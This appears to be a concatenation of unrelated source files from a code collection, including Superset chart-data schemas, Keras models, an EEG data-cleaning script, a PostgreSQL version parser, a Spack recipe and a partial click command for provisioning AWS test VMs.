"compare",
"resample",
)
),
example="aggregate",
)
options = fields.Dict(
description="Options specifying how to perform the operation. Please refer "
"to the respective post processing operation option schemas. "
"For example, `ChartDataPostProcessingOperationOptions` specifies "
"the required options for the pivot operation.",
example={
"groupby": ["country", "gender"],
"aggregates": {
"age_q1": {
"operator": "percentile",
"column": "age",
"options": {"q": 0.25},
},
"age_mean": {"operator": "mean", "column": "age",},
},
},
)
class ChartDataFilterSchema(Schema):
col = fields.Raw(
description="The column to filter by. Can be either a string (physical or "
"saved expression) or an object (adhoc column)",
required=True,
example="country",
)
op = fields.String( # pylint: disable=invalid-name
description="The comparison operator.",
validate=utils.OneOfCaseInsensitive(
choices=[filter_op.value for filter_op in FilterOperator]
),
required=True,
example="IN",
)
val = fields.Raw(
description="The value or values to compare against. Can be a string, "
"integer, decimal or list, depending on the operator.",
example=["China", "France", "Japan"],
)
grain = fields.String(
description="Optional time grain for temporal filters", example="PT1M",
)
isExtra = fields.Boolean(
description="Indicates if the filter has been added by a filter component as "
"opposed to being a part of the original query."
)
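# Minimal usage sketch (an addition, not part of the original module): filter
# clauses arrive as plain dicts in the request body and can be validated in
# isolation. This assumes an importable Superset environment, since the module
# pulls in the Superset app at import time.
def _example_validate_filter():
    example_filter = {"col": "country", "op": "IN", "val": ["China", "France", "Japan"]}
    # load() raises a marshmallow ValidationError if, e.g., `op` is not a known operator.
    return ChartDataFilterSchema().load(example_filter)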
class ChartDataExtrasSchema(Schema):
time_range_endpoints = fields.List(EnumField(TimeRangeEndpoint, by_value=True))
relative_start = fields.String(
description="Start time for relative time deltas. "
'Default: `config["DEFAULT_RELATIVE_START_TIME"]`',
validate=validate.OneOf(choices=("today", "now")),
)
relative_end = fields.String(
description="End time for relative time deltas. "
'Default: `config["DEFAULT_RELATIVE_START_TIME"]`',
validate=validate.OneOf(choices=("today", "now")),
)
where = fields.String(
description="WHERE clause to be added to queries using AND operator.",
)
having = fields.String(
description="HAVING clause to be added to aggregate queries using "
"AND operator.",
)
having_druid = fields.List(
fields.Nested(ChartDataFilterSchema),
description="HAVING filters to be added to legacy Druid datasource queries.",
)
time_grain_sqla = fields.String(
description="To what level of granularity should the temporal column be "
"aggregated. Supports "
"[ISO 8601](https://en.wikipedia.org/wiki/ISO_8601#Durations) durations.",
validate=validate.OneOf(
choices=[
i
for i in {**builtin_time_grains, **config["TIME_GRAIN_ADDONS"]}.keys()
if i
]
),
example="P1D",
allow_none=True,
)
druid_time_origin = fields.String(
description="Starting point for time grain counting on legacy Druid "
"datasources. Used to change e.g. Monday/Sunday first-day-of-week.",
allow_none=True,
)
class AnnotationLayerSchema(Schema):
annotationType = fields.String(
description="Type of annotation layer",
validate=validate.OneOf(choices=[ann.value for ann in AnnotationType]),
)
color = fields.String(description="Layer color", allow_none=True,)
descriptionColumns = fields.List(
fields.String(),
description="Columns to use as the description. If none are provided, "
"all will be shown.",
)
hideLine = fields.Boolean(
description="Should line be hidden. Only applies to line annotations",
allow_none=True,
)
intervalEndColumn = fields.String(
description=(
"Column containing end of interval. Only applies to interval layers"
),
allow_none=True,
)
name = fields.String(description="Name of layer", required=True)
opacity = fields.String(
description="Opacity of layer",
validate=validate.OneOf(
choices=("", "opacityLow", "opacityMedium", "opacityHigh"),
),
allow_none=True,
required=False,
)
overrides = fields.Dict(
keys=fields.String(
desciption="Name of property to be overridden",
validate=validate.OneOf(
choices=("granularity", "time_grain_sqla", "time_range", "time_shift"),
),
),
values=fields.Raw(allow_none=True),
description="which properties should be overridable",
allow_none=True,
)
show = fields.Boolean(description="Should the layer be shown", required=True)
showMarkers = fields.Boolean(
description="Should markers be shown. Only applies to line annotations.",
required=True,
)
sourceType = fields.String(
description="Type of source for annotation data",
validate=validate.OneOf(choices=("", "line", "NATIVE", "table",)),
)
style = fields.String(
description="Line style. Only applies to time-series annotations",
validate=validate.OneOf(choices=("dashed", "dotted", "solid", "longDashed",)),
)
timeColumn = fields.String(
description="Column with event date or interval start date", allow_none=True,
)
titleColumn = fields.String(description="Column with title", allow_none=True,)
width = fields.Float(
description="Width of annotation line",
validate=[
Range(
min=0,
min_inclusive=True,
error=_("`width` must be greater or equal to 0"),
)
],
)
value = fields.Raw(
description="For formula annotations, this contains the formula. "
"For other types, this is the primary key of the source object.",
required=True,
)
class ChartDataDatasourceSchema(Schema):
description = "Chart datasource"
id = fields.Integer(description="Datasource id", required=True,)
type = fields.String(
description="Datasource type",
validate=validate.OneOf(choices=("druid", "table")),
)
slice_id = fields.Integer(description="Slice id", required=False,)
class ChartDataQueryObjectSchema(Schema):
class Meta: # pylint: disable=too-few-public-methods
unknown = EXCLUDE
datasource = fields.Nested(ChartDataDatasourceSchema, allow_none=True)
result_type = EnumField(ChartDataResultType, by_value=True, allow_none=True)
annotation_layers = fields.List(
fields.Nested(AnnotationLayerSchema),
description="Annotation layers to apply to chart",
allow_none=True,
)
applied_time_extras = fields.Dict(
description="A mapping of temporal extras that have been applied to the query",
allow_none=True,
example={"__time_range": "1 year ago : now"},
)
apply_fetch_values_predicate = fields.Boolean(
description="Add fetch values predicate (where clause) to query "
"if defined in datasource",
allow_none=True,
)
filters = fields.List(fields.Nested(ChartDataFilterSchema), allow_none=True)
granularity = fields.String(
description="Name of temporal column used for time filtering. For legacy Druid "
"datasources this defines the time grain.",
allow_none=True,
)
granularity_sqla = fields.String(
description="Name of temporal column used for time filtering for SQL "
"datasources. This field is deprecated, use `granularity` "
"instead.",
allow_none=True,
deprecated=True,
)
groupby = fields.List(
fields.Raw(),
description="Columns by which to group the query. "
"This field is deprecated, use `columns` instead.",
allow_none=True,
)
metrics = fields.List(
fields.Raw(),
description="Aggregate expressions. Metrics can be passed as both "
"references to datasource metrics (strings), or ad-hoc metrics"
"which are defined only within the query object. See "
"`ChartDataAdhocMetricSchema` for the structure of ad-hoc metrics.",
allow_none=True,
)
post_processing = fields.List(
fields.Nested(ChartDataPostProcessingOperationSchema, allow_none=True),
allow_none=True,
description="Post processing operations to be applied to the result set. "
"Operations are applied to the result set in sequential order.",
)
time_range = fields.String(
description="A time rage, either expressed as a colon separated string "
"`since : until` or human readable freeform. Valid formats for "
"`since` and `until` are: \n"
"- ISO 8601\n"
"- X days/years/hours/day/year/weeks\n"
"- X days/years/hours/day/year/weeks ago\n"
"- X days/years/hours/day/year/weeks from now\n"
"\n"
"Additionally, the following freeform can be used:\n"
"\n"
"- Last day\n"
"- Last week\n"
"- Last month\n"
"- Last quarter\n"
"- Last year\n"
"- No filter\n"
"- Last X seconds/minutes/hours/days/weeks/months/years\n"
"- Next X seconds/minutes/hours/days/weeks/months/years\n",
example="Last week",
allow_none=True,
)
time_shift = fields.String(
description="A human-readable date/time string. "
"Please refer to [parsdatetime](https://github.com/bear/parsedatetime) "
"documentation for details on valid values.",
allow_none=True,
)
is_timeseries = fields.Boolean(
description="Is the `query_object` a timeseries.", allow_none=True,
)
series_columns = fields.List(
fields.Raw(),
description="Columns to use when limiting series count. "
"All columns must be present in the `columns` property. "
"Requires `series_limit` and `series_limit_metric` to be set.",
allow_none=True,
)
series_limit = fields.Integer(
description="Maximum number of series. "
"Requires `series` and `series_limit_metric` to be set.",
allow_none=True,
)
series_limit_metric = fields.Raw(
description="Metric used to limit timeseries queries by. "
"Requires `series` and `series_limit` to be set.",
allow_none=True,
)
timeseries_limit = fields.Integer(
description="Maximum row count for timeseries queries. "
"This field is deprecated, use `series_limit` instead."
"Default: `0`",
allow_none=True,
)
timeseries_limit_metric = fields.Raw(
description="Metric used to limit timeseries queries by. "
"This field is deprecated, use `series_limit_metric` instead.",
allow_none=True,
)
row_limit = fields.Integer(
description='Maximum row count (0=disabled). Default: `config["ROW_LIMIT"]`',
allow_none=True,
validate=[
Range(min=0, error=_("`row_limit` must be greater than or equal to 0"))
],
)
row_offset = fields.Integer(
description="Number of rows to skip. Default: `0`",
allow_none=True,
validate=[
Range(min=0, error=_("`row_offset` must be greater than or equal to 0"))
],
)
order_desc = fields.Boolean(
description="Reverse order. Default: `false`", allow_none=True,
)
extras = fields.Nested(
ChartDataExtrasSchema,
description="Extra parameters to add to the query.",
allow_none=True,
)
columns = fields.List(
fields.Raw(),
description="Columns which to select in the query.",
allow_none=True,
)
orderby = fields.List(
fields.Tuple(
(
fields.Raw(
validate=[
Length(min=1, error=_("orderby column must be populated"))
],
allow_none=False,
),
fields.Boolean(),
)
),
description="Expects a list of lists where the first element is the column "
"name which to sort by, and the second element is a boolean.",
allow_none=True,
example=[("my_col_1", False), ("my_col_2", True)],
)
where = fields.String(
description="WHERE clause to be added to queries using AND operator."
"This field is deprecated and should be passed to `extras`.",
allow_none=True,
deprecated=True,
)
having = fields.String(
description="HAVING clause to be added to aggregate queries using "
"AND operator. This field is deprecated and should be passed "
"to `extras`.",
allow_none=True,
deprecated=True,
)
having_filters = fields.List(
fields.Nested(ChartDataFilterSchema),
description="HAVING filters to be added to legacy Druid datasource queries. "
"This field is deprecated and should be passed to `extras` "
"as `having_druid`.",
allow_none=True,
deprecated=True,
)
druid_time_origin = fields.String(
description="Starting point for time grain counting on legacy Druid "
"datasources. Used to change e.g. Monday/Sunday first-day-of-week. "
"This field is deprecated and should be passed to `extras` "
"as `druid_time_origin`.",
allow_none=True,
)
url_params = fields.Dict(
description="Optional query parameters passed to a dashboard or Explore view",
keys=fields.String(description="The query parameter"),
values=fields.String(description="The value of the query parameter"),
allow_none=True,
)
is_rowcount = fields.Boolean(
description="Should the rowcount of the actual query be returned",
allow_none=True,
)
time_offsets = fields.List(fields.String(), allow_none=True,)
class ChartDataQueryContextSchema(Schema):
datasource = fields.Nested(ChartDataDatasourceSchema)
queries = fields.List(fields.Nested(ChartDataQueryObjectSchema))
force = fields.Boolean(
description="Should the queries be forced to load from the source. "
"Default: `false`",
)
result_type = EnumField(ChartDataResultType, by_value=True)
result_format = EnumField(ChartDataResultFormat, by_value=True)
# pylint: disable=no-self-use,unused-argument
@post_load
def make_query_context(self, data: Dict[str, Any], **kwargs: Any) -> QueryContext:
query_context = QueryContext(**data)
return query_context
# pylint: enable=no-self-use,unused-argument
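# Illustrative sketch (an addition, not part of the original module): because of
# the @post_load hook above, deserializing a valid request body yields a
# QueryContext instance rather than a plain dict. A configured Superset
# application is assumed, since QueryContext resolves the referenced datasource.
def _example_load_query_context(payload: Dict[str, Any]) -> QueryContext:
    query_context = ChartDataQueryContextSchema().load(payload)
    assert isinstance(query_context, QueryContext)
    return query_context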
class AnnotationDataSchema(Schema):
columns = fields.List(
fields.String(),
description="columns available in the annotation result",
required=True,
)
records = fields.List(
fields.Dict(keys=fields.String(),),
description="records mapping the column name to it's value",
required=True,
)
class ChartDataResponseResult(Schema):
annotation_data = fields.List(
fields.Dict(
keys=fields.String(description="Annotation layer name"),
values=fields.String(),
),
description="All requested annotation data",
allow_none=True,
)
cache_key = fields.String(
description="Unique cache key for query object", required=True, allow_none=True,
)
cached_dttm = fields.String(
description="Cache timestamp", required=True, allow_none=True,
)
cache_timeout = fields.Integer(
description="Cache timeout in following order: custom timeout, datasource "
"timeout, default config timeout.",
required=True,
allow_none=True,
)
error = fields.String(description="Error", allow_none=True,)
is_cached = fields.Boolean(
description="Is the result cached", required=True, allow_none=None,
)
query = fields.String(
description="The executed query statement", required=True, allow_none=False,
)
status = fields.String(
description="Status of the query",
validate=validate.OneOf(
choices=(
"stopped",
"failed",
"pending",
"running",
"scheduled",
"success",
"timed_out",
)
),
allow_none=False,
)
stacktrace = fields.String(
desciption="Stacktrace if there was an error", allow_none=True,
)
rowcount = fields.Integer(
description="Amount of rows in result set", allow_none=False,
)
data = fields.List(fields.Dict(), description="A list with results")
applied_filters = fields.List(
fields.Dict(), description="A list with applied filters"
)
rejected_filters = fields.List(
fields.Dict(), description="A list with rejected filters"
)
class ChartDataResponseSchema(Schema):
result = fields.List(
fields.Nested(ChartDataResponseResult),
description="A list of results for each corresponding query in the request.",
)
class ChartDataAsyncResponseSchema(Schema):
channel_id = fields.String(
description="Unique session async channel ID", allow_none=False,
)
job_id = fields.String(description="Unique async job ID", allow_none=False,)
user_id = fields.String(description="Requesting user ID", allow_none=True,)
status = fields.String(description="Status value for async job", allow_none=False,)
result_url = fields.String(
description="Unique result URL for fetching async query data", allow_none=False,
)
class ChartFavStarResponseResult(Schema):
id = fields.Integer(description="The Chart id")
value = fields.Boolean(description="The FaveStar value")
class GetFavStarIdsSchema(Schema):
result = fields.List(
fields.Nested(ChartFavStarResponseResult),
description="A list of results for each corresponding chart in the request",
)
class ImportV1ChartSchema(Schema):
slice_name = fields.String(required=True)
viz_type = fields.String(required=True)
params = fields.Dict()
query_context = fields.String(allow_none=True, validate=utils.validate_json)
cache_timeout = fields.Integer(allow_none=True)
uuid = fields.UUID(required=True)
version = fields.String(required=True)
dataset_uuid = fields.UUID(required=True)
CHART_SCHEMAS = (
ChartDataQueryContextSchema,
ChartDataResponseSchema,
ChartDataAsyncResponseSchema,
# TODO: These should optimally be included in the QueryContext schema as an `anyOf`
    # in ChartDataPostProcessingOperation.options, but since `anyOf` is not
    # supported by Marshmallow<3, this is not currently possible.
ChartDataAdhocMetricSchema,
ChartDataAggregateOptionsSchema,
ChartDataContributionOptionsSchema,
ChartDataProphetOptionsSchema,
ChartDataBoxplotOptionsSchema,
ChartDataPivotOptionsSchema,
ChartDataRollingOptionsSchema,
ChartDataSelectOptionsSchema,
ChartDataSortOptionsSchema,
ChartDataGeohashDecodeOptionsSchema,
ChartDataGeohashEncodeOptionsSchema,
ChartDataGeodeticParseOptionsSchema,
ChartEntityResponseSchema,
ChartGetDatasourceResponseSchema,
ChartCacheScreenshotResponseSchema,
GetFavStarIdsSchema,
)
|
the-stack_106_14849
|
# -*- coding: utf-8 -*-
"""PyMongo_-flavored package for accessing to MongoLab databases via
`MongoLabClient`.
.. _PyMongo: http://api.mongodb.org/python/current/"""
ASCENDING = 1
"""Ascending sort order."""
DESCENDING = -1
"""Descending sort order."""
OFF = 0
"""No database profiling."""
SLOW_ONLY = 1
"""Only profile slow operations."""
ALL = 2
"""Profile all operations."""
version_tuple = (1, 2, '+')
def get_version_string():
if isinstance(version_tuple[-1], basestring):
return '.'.join(map(str, version_tuple[:-1])) + version_tuple[-1]
return '.'.join(map(str, version_tuple))
version = get_version_string()
from pymongolab.connection import Connection
from pymongolab.mongo_client import MongoClient
|
the-stack_106_14853
|
import keras
from keras.layers import Dense, Dropout, BatchNormalization
from keras.models import Sequential
import pandas as pd
import numpy as np
def shallow_model():
input_layer = 5
output_layer = 2
h_layer1 = 8
dropout1 = 0.25
h_layer2 = 8
dropout2 = 0.5
model = Sequential()
model.add(Dense(h_layer1, activation='relu', input_shape=(input_layer, )))
model.add(BatchNormalization())
model.add(Dropout(dropout1))
model.add(Dense(h_layer2, activation='relu'))
model.add(BatchNormalization())
model.add(Dropout(dropout2))
model.add(Dense(output_layer, activation='softmax'))
return model
def bow_model():
input_layer = 262
output_layer = 2
h_layer1 = 512
dropout1 = 0.25
h_layer2 = 256
dropout2 = 0.5
h_layer3 = 128
dropout3 = 0.5
model = Sequential()
model.add(Dense(h_layer1, activation='relu', input_shape=(input_layer, )))
model.add(BatchNormalization())
model.add(Dropout(dropout1))
model.add(Dense(h_layer2, activation='relu'))
model.add(BatchNormalization())
model.add(Dropout(dropout2))
model.add(Dense(h_layer3, activation='relu', ))
model.add(BatchNormalization())
model.add(Dense(output_layer, activation='softmax'))
return model
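# Usage sketch (an addition, not part of the original module): compiling and
# fitting one of the models above. It assumes feature matrices matching the
# input sizes hard-coded in the builders (5 for shallow_model, 262 for
# bow_model) and one-hot encoded labels with 2 classes.
def train_model(model, x_train, y_train, epochs=20, batch_size=32):
    # Two-unit softmax output, so categorical cross-entropy is the matching loss.
    model.compile(optimizer='adam',
                  loss='categorical_crossentropy',
                  metrics=['accuracy'])
    return model.fit(x_train, y_train,
                     epochs=epochs,
                     batch_size=batch_size,
                     validation_split=0.1)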
|
the-stack_106_14854
|
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 3 14:49:20 2020
@author: The Jipsess
"""
# The data used here is EEG data. Originally there were 500 participants, who
# were recorded for 23.5 seconds with 4097 data points per sample. Each sample
# was divided into 23 chunks, each containing 178 data points for 1 second.
# These chunks were shuffled, resulting in 11500 samples.
#
#
# 5 - (healthy, surface recording) eyes open, means when they were recording the EEG signal of the brain the patient had their eyes open
# 4 - (healthy, surface recording) eyes closed, means when they were recording the EEG signal the patient had their eyes closed
# 3 - (epileptic, intracranial recording) The EEG activity from the hippocampal formation in the non-epileptogenic hemisphere, with no seizure
# 2 - (epileptic, intracranial recording) The EEG activity from the epileptogenic zone brain area, with no seizure
# 1 - (epileptic, intracranial recording) Recording of seizure activity
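# Illustrative helper (an addition, not part of the original script): the usual
# binary framing of this dataset keeps class 1 as "seizure" and collapses
# classes 2-5 into "no seizure".
def to_binary_seizure_label(class_labels):
    # class_labels is expected to be a pandas Series holding the 1-5 labels
    # from the last column of the data file.
    return (class_labels == 1).astype(int)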
import os
import numpy as np
import pandas as pd
from sklearn import preprocessing as pp
from sklearn.covariance import EllipticEnvelope as mcd
from sklearn.decomposition import PCA
from matplotlib import pyplot as plt
os.chdir("D:/OneDrive/school/1. Master/11. Scientific Programming/Github/Seizure_Recognition")
x = pd.read_csv("Data/data.csv", sep = ";")
# %% Data inspection
# Count number of missing values
nullsum = np.sum(np.sum(x.isnull()))
# %% Data Cleaning
# Set variable names colummn as index
x.set_index('Unnamed: 0', inplace = True)
# == Missing Data ==
# Remove all samples with any missing data
x.dropna(inplace = True)
# == Noise Removal ==
# == Outlier Detection ==
cov = mcd(support_fraction = 0.6, random_state = 0).fit(x)
outliers = cov.predict(x)
num_outliers = np.unique(outliers, return_counts=True)
# %% PCA
scaled_x = pp.scale(x.iloc[:,0:-1])
pca = PCA()
pca.fit(scaled_x)
pca_x = pca.transform(scaled_x)
plt.figure()
colors = ['navy', 'turquoise', 'darkorange']
lw = 2
plt.scatter(pca_x[:,0], pca_x[:,1])
# %% Data Transformation
# Data Normilisation
y = pp.normalize(x)
# %% Visualisation
# Let's inspect the distribution of the data
plt.hist(x['X1'], bins = 200, histtype = 'barstacked')
plt.show()
fig, axes = plt.subplots()
plt.hist(x.iloc[:,1:3], 20, histtype='step', stacked=True, fill=False)
plt.hist(x['X1'], 100, alpha = 0.5, label='a')
plt.hist(x['X2'], 100, alpha = 0.5, label='b')
plt.legend(loc='upper left')
plt.show()
for col in x.columns[1:-1]:
plt.hist(x[col], 100, alpha = 0.5)
plt.show()
# Visualise noise
plt.figure(dpi = 300)
for i in range(80,82):
plt.plot(x.iloc[i,1:-1], alpha = 0.75, linewidth=0.2)
plt.show()
plt.figure(dpi = 300)
plt.plot(x.iloc[105,1:-1], marker ='x', markersize=3)
plt.show()
|
the-stack_106_14857
|
import argparse
import sys
def parse_args():
"""
Parse input arguments
"""
parser = argparse.ArgumentParser()
# Data loading params
# parser.add_argument("--train_path", default="SemEval2010_task8_all_data/SemEval2010_task8_training/TRAIN_FILE.TXT",
# type=str, help="Path of train data")
# parser.add_argument("--test_path", default="SemEval2010_task8_all_data/SemEval2010_task8_testing_keys/TEST_FILE_FULL.TXT",
# type=str, help="Path of test data")
parser.add_argument("--train_path", default="myData/train.txt",
type=str, help="Path of train data")
parser.add_argument("--test_path",
default="myData/test.txt",
type=str, help="Path of test data")
parser.add_argument("--max_sentence_length", default=202,
type=int, help="Max sentence length in data")
parser.add_argument("--dev_sample_percentage", default=0.1,
type=float, help="Percentage of the training data to use for validation")
parser.add_argument("--relation_file", default="myData/relation2id.txt",
type=str, help="Path of relation file")
# Model Hyper-parameters
# Embeddings
parser.add_argument("--embedding_path", default=None,
type=str, help="Path of pre-trained word embeddings (word2vec)")
parser.add_argument("--text_embedding_dim", default=100,
type=int, help="Dimensionality of word embedding (default: 300)")
parser.add_argument("--pos_embedding_dim", default=50,
type=int, help="Dimensionality of relative position embedding (default: 50)")
# CNN
parser.add_argument("--filter_sizes", default="2,3,4,5",
type=str, help="Comma-separated filter sizes (Default: 2,3,4,5)")
parser.add_argument("--num_filters", default=128,
type=int, help="Number of filters per filter size (Default: 128)")
# Misc
parser.add_argument("--desc", default="",
type=str, help="Description for model")
parser.add_argument("--dropout_keep_prob", default=0.5,
type=float, help="Dropout keep probability of output layer (default: 0.5)")
parser.add_argument("--l2_reg_lambda", default=1e-5,
type=float, help="L2 regularization lambda (default: 1e-5)")
# Training parameters
parser.add_argument("--batch_size", default=20,
type=int, help="Batch Size (default: 20)")
parser.add_argument("--num_epochs", default=100,
type=int, help="Number of training epochs (Default: 100)")
parser.add_argument("--display_every", default=10,
type=int, help="Number of iterations to display training information")
parser.add_argument("--evaluate_every", default=100,
type=int, help="Evaluate model on dev set after this many steps (default: 100)")
parser.add_argument("--num_checkpoints", default=5,
type=int, help="Number of checkpoints to store (default: 5)")
parser.add_argument("--learning_rate", default=1.0,
type=float, help="Which learning rate to start with (Default: 1.0)")
parser.add_argument("--decay_rate", default=0.9,
type=float, help="Decay rate for learning rate (Default: 0.9)")
# Testing parameters
parser.add_argument("--checkpoint_dir", default="runs/1565578114/checkpoints",
type=str, help="Checkpoint directory from training run")
# Misc Parameters
parser.add_argument("--allow_soft_placement", default=True,
type=bool, help="Allow device soft device placement")
parser.add_argument("--log_device_placement", default=False,
type=bool, help="Log placement of ops on devices")
parser.add_argument("--gpu_allow_growth", default=True,
type=bool, help="Allow gpu memory growth")
# Log
parser.add_argument("--train_log_file", default="train.log", type=str, help="name for train log")
parser.add_argument("--test_log_file", default="test.log", type=str, help="name for test log")
    if len(sys.argv) == 1:  # only the script name was supplied, so show help
parser.print_help()
sys.exit(1)
print("")
args = parser.parse_args()
for arg in vars(args):
print("{}={}".format(arg.upper(), getattr(args, arg)))
print("")
return args
FLAGS = parse_args()
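# Usage sketch (an addition, not part of the original module): downstream
# training code would typically consume the parsed flags along these lines.
if __name__ == "__main__":
    filter_sizes = list(map(int, FLAGS.filter_sizes.split(",")))
    print("train data: {}".format(FLAGS.train_path))
    print("filter sizes: {}".format(filter_sizes))
    print("batch size: {}".format(FLAGS.batch_size))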
|
the-stack_106_14858
|
##
# .versionstring
##
"""
PostgreSQL version string parsing.
>>> postgresql.versionstring.split('8.0.1')
(8, 0, 1, None, None)
"""
def split(vstr: str) -> tuple:
"""
Split a PostgreSQL version string into a tuple.
(major, minor, patch, ..., state_class, state_level)
"""
v = vstr.strip().split('.')
# Get rid of the numbers around the state_class (beta,a,dev,alpha, etc)
state_class = v[-1].strip('0123456789')
if state_class:
last_version, state_level = v[-1].split(state_class)
if not state_level:
state_level = None
else:
state_level = int(state_level)
vlist = [int(x or '0') for x in v[:-1]]
if last_version:
vlist.append(int(last_version))
vlist += [None] * (3 - len(vlist))
vlist += [state_class, state_level]
else:
state_level = None
state_class = None
vlist = [int(x or '0') for x in v]
# pad the difference with `None` objects, and +2 for the state_*.
vlist += [None] * ((3 - len(vlist)) + 2)
return tuple(vlist)
def unsplit(vtup: tuple) -> str:
"""
Join a version tuple back into the original version string.
"""
svtup = [str(x) for x in vtup[:-2] if x is not None]
state_class, state_level = vtup[-2:]
return '.'.join(svtup) + ('' if state_class is None else state_class + str(state_level))
def normalize(split_version: tuple) -> tuple:
"""
Given a tuple produced by `split`, normalize the `None` objects into int(0)
or 'final' if it's the ``state_class``.
"""
(*head, state_class, state_level) = split_version
mmp = [x if x is not None else 0 for x in head]
return tuple(mmp + [state_class or 'final', state_level or 0])
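# Illustrative round-trip (an addition, not part of the original module),
# exercising the three helpers above on a beta-style version string.
def _roundtrip_example():
    parts = split('9.6beta2')                  # -> (9, 6, None, 'beta', 2)
    assert normalize(parts) == (9, 6, 0, 'beta', 2)
    assert unsplit(parts) == '9.6beta2'
    return parts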
default_state_class_priority = [
'dev',
'a',
'alpha',
'b',
'beta',
'rc',
'final',
None,
]
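# A quick sketch of how these helpers compose (results traced by hand from the
# functions above; shown as comments only):
#
#   split('9.4beta2')                   -> (9, 4, None, 'beta', 2)
#   normalize((9, 4, None, 'beta', 2))  -> (9, 4, 0, 'beta', 2)
#   unsplit((9, 4, None, 'beta', 2))    -> '9.4beta2'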
# Output formatters for the command-line entry point below; each one is looked
# up by name via getattr(sys.modules[__name__], format) and called with a
# version tuple (hence the `self` parameter on xml() and sh()).
python = repr
def xml(self):
return '<version type="one">\n' + \
' <major>' + str(self[0]) + '</major>\n' + \
' <minor>' + str(self[1]) + '</minor>\n' + \
' <patch>' + str(self[2]) + '</patch>\n' + \
' <state>' + str(self[-2]) + '</state>\n' + \
' <level>' + str(self[-1]) + '</level>\n' + \
'</version>'
def sh(self):
return """PG_VERSION_MAJOR=%s
PG_VERSION_MINOR=%s
PG_VERSION_PATCH=%s
PG_VERSION_STATE=%s
PG_VERSION_LEVEL=%s""" %(
str(self[0]),
str(self[1]),
str(self[2]),
str(self[-2]),
str(self[-1]),
)
if __name__ == '__main__':
import sys
import os
from optparse import OptionParser
op = OptionParser()
op.add_option('-f', '--format',
type='choice',
dest='format',
help='format of output information',
choices=('sh', 'xml', 'python'),
default='sh',
)
op.add_option('-n', '--normalize',
action='store_true',
dest='normalize',
help='replace missing values with defaults',
default=False,
)
op.set_usage(op.get_usage().strip() + ' "version to parse"')
co, ca = op.parse_args()
if len(ca) != 1:
op.error('requires exactly one argument, the version')
else:
v = split(ca[0])
if co.normalize:
v = normalize(v)
sys.stdout.write(getattr(sys.modules[__name__], co.format)(v))
sys.stdout.write(os.linesep)
|
the-stack_106_14860
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Libxdamage(AutotoolsPackage, XorgPackage):
"""This package contains the library for the X Damage extension."""
homepage = "https://cgit.freedesktop.org/xorg/lib/libXdamage"
xorg_mirror_path = "lib/libXdamage-1.1.4.tar.gz"
version('1.1.4', sha256='4bb3e9d917f5f593df2277d452926ee6ad96de7b7cd1017cbcf4579fe5d3442b')
depends_on('libxfixes')
depends_on('libx11')
depends_on('[email protected]:')
depends_on('fixesproto')
depends_on('xextproto')
depends_on('pkgconfig', type='build')
depends_on('util-macros', type='build')
|
the-stack_106_14864
|
# coding=utf-8
from __future__ import absolute_import, division, print_function
from click import Choice, ClickException, command, option, pass_context
from ..common_options import discrete_ssh_config_option
from ...util.common_options import ansible_output_options
class OperatingSystem(object):
"""
An enumeration of supported operating systems for
Vagrant provisioning of VMs.
"""
fedora = 'fedora'
centos = 'centos'
rhel = 'rhel'
class Provider(object):
"""
An enumeration of supported clouds for provisioning
of VMs.
"""
aws = 'aws'
class Stage(object):
"""
An enumeration of supported stages for images used
for provisioning of VMs.
"""
bare = 'bare'
base = 'base'
build = 'build'
install = 'install'
fork = 'fork'
crio = 'crio'
def destroy_callback(context, _, value):
"""
Tear down the currently running VM
:param context: Click context
:param _: command-line parameter
:param value: whether or not to tear down the VM
"""
if not value or context.resilient_parsing:
return
destroy(context.obj)
context.exit()
_SHORT_HELP = 'Provision a virtual host for an All-In-One deployment.'
@command(
name='all-in-one',
short_help=_SHORT_HELP,
help=_SHORT_HELP + '''
An All-In-One deployment of OpenShift uses one virtual host on which
all cluster components are provisioned. These types of deployments are
most useful for short-term development work-flows.
\b
Examples:
Provision a VM with default parameters (fedora, aws, install)
$ oct provision remote all-in-one
\b
Provision a VM with custom parameters
$ oct provision remote all-in-one --os=centos --provider=aws --stage=base
\b
Tear down the currently running VMs
$ oct provision remote all-in-one --destroy
''',
)
@option(
'--os',
'-o',
'operating_system',
type=Choice([
OperatingSystem.fedora,
OperatingSystem.centos,
OperatingSystem.rhel,
]),
default=OperatingSystem.fedora,
show_default=True,
metavar='NAME',
help='VM operating system.',
)
@option(
'--provider',
'-p',
type=Choice([Provider.aws, ]),
default=Provider.aws,
show_default=True,
metavar='NAME',
help='Cloud provider.',
)
@option(
'--stage',
'-s',
type=Choice([
Stage.bare,
Stage.base,
Stage.build,
Stage.install,
Stage.fork,
Stage.crio,
]),
default=Stage.install,
show_default=True,
metavar='NAME',
help='VM image stage.',
)
@option(
'--name',
'-n',
metavar='NAME',
required=True,
help='VM instance name.',
)
@option(
'--ami-id',
'-a',
'ami_id',
metavar='ID',
help='AWS AMI identifier.',
)
@option(
'--destroy',
'-d',
is_flag=True,
expose_value=False,
help='Tear down the current VMs.',
callback=destroy_callback,
)
@discrete_ssh_config_option
@ansible_output_options
@pass_context
def all_in_one_command(context, operating_system, provider, stage, name, ami_id, discrete_ssh_config):
"""
Provision a virtual host for an All-In-One deployment.
:param context: Click context
:param operating_system: operating system to use for the VM
:param provider: provider to use with Vagrant
:param stage: image stage to base the VM off of
:param name: name to give to the VM instance
:param ami_id: AWS EC2 AMI identifier
:param discrete_ssh_config: whether to update ~/.ssh/config or write a new file
"""
configuration = context.obj
if provider == Provider.aws:
provision_with_aws(configuration, operating_system, stage, name, ami_id, discrete_ssh_config)
else:
if ami_id is not None:
raise ClickException("An AWS EC2 AMI identifier cannot be provided when launching in {}".format(provider))
def destroy(configuration):
"""
Tear down the currently running VMs.
:param configuration: Origin CI Tool configuration
"""
configuration.run_playbook(playbook_relative_path='provision/aws_all_in_one_down', )
def provision_with_aws(configuration, operating_system, stage, name, ami_id, discrete_ssh_config):
"""
Provision a VM in the cloud using AWS EC2.
:param configuration: Origin CI tool configuration
:param operating_system: operating system used for the VM
:param stage: image stage the VM was based off of
:param name: name to give to the VM instance
:param ami_id: AWS EC2 AMI identifier
:param discrete_ssh_config: whether to update ~/.ssh/config or write a new file
"""
if not configuration.aws_client_configuration.keypair_name:
raise ClickException('No key-pair name found! Configure one using:\n $ oct configure aws-client keypair_name NAME')
if not configuration.aws_client_configuration.private_key_path:
raise ClickException(
